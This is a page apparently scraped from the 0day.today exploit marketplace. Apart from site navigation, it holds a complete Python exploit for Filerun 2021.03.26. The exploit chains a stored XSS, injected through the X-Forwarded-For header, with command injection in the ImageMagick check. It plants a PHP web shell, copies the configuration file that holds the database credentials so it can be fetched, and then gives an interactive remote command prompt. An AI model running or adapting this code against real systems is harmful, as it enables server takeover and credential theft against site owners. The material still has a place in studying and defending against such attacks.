0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Filerun 2021.03.26 - Remote Code Execution (Authenticated) Exploit
# Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: syntegris information solutions GmbH # Credits: Christian P. # Vendor Homepage: https://filerun.com # Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t # Version: 2021.03.26 # Tested on: official docker image # PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution import requests import time import sys # this is the plain version of the payload below """ var xmlhttp = new XMLHttpRequest(); var url = '/?module=cpanel§ion=settings&page=image_preview&action=checkImageMagick' var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #"; xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == XMLHttpRequest.DONE) { if (xmlhttp.status == 200) { console.log(xmlhttp.responseText); } } }; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send("mode=exec&path=convert|"+payload); """ if not len(sys.argv) == 2: print("missing target url") sys.exit(1) target = sys.argv[1] def inject_code(): payload = "var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>'  > shell.php #";

xmlhttp.onreadystatechange = function() {
	if (xmlhttp.readyState == XMLHttpRequest.DONE) {
	   if (xmlhttp.status == 200) {
		   console.log(xmlhttp.responseText);
	   }
	   else if (xmlhttp.status == 400) {
		  alert('There was an error 400');
	   }
	   else {
		   alert('something else other than 200 was returned');
	   }
	}
};

xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
" req = requests.post( "%s/?module=fileman&page=login&action=login" % target, data={'username': 'nonexistend', 'password': 'wrong', 'otp':'', 'two_step_secret':'','language':''}, headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload} ) def check_shell_exists(): req = requests.get("%s/shell.php" % target) if req.status_code != 200: return False return True def process_command(command): req = requests.get("%s/shell.php?cmd=%s" % (target, command)) print(req.text) while True: print("Injecting new log message...") inject_code() time.sleep(10) if check_shell_exists(): print("Shell exists under '%s/shell.php?cmd=ls'" % target) break print("Lets get autoconfig.php which contains database credentials...") process_command("cp system/data/autoconfig.php js/autoconfig.txt") ac_resp = requests.get("%s/js/autoconfig.txt" % target) with open("filerun.autoconfig.php", "wb") as ac_f: ac_f.write(ac_resp.content) process_command("rm js/autoconfig.php") while True: command = input("Command:") process_command(command) # 0day.today [2024-07-07] #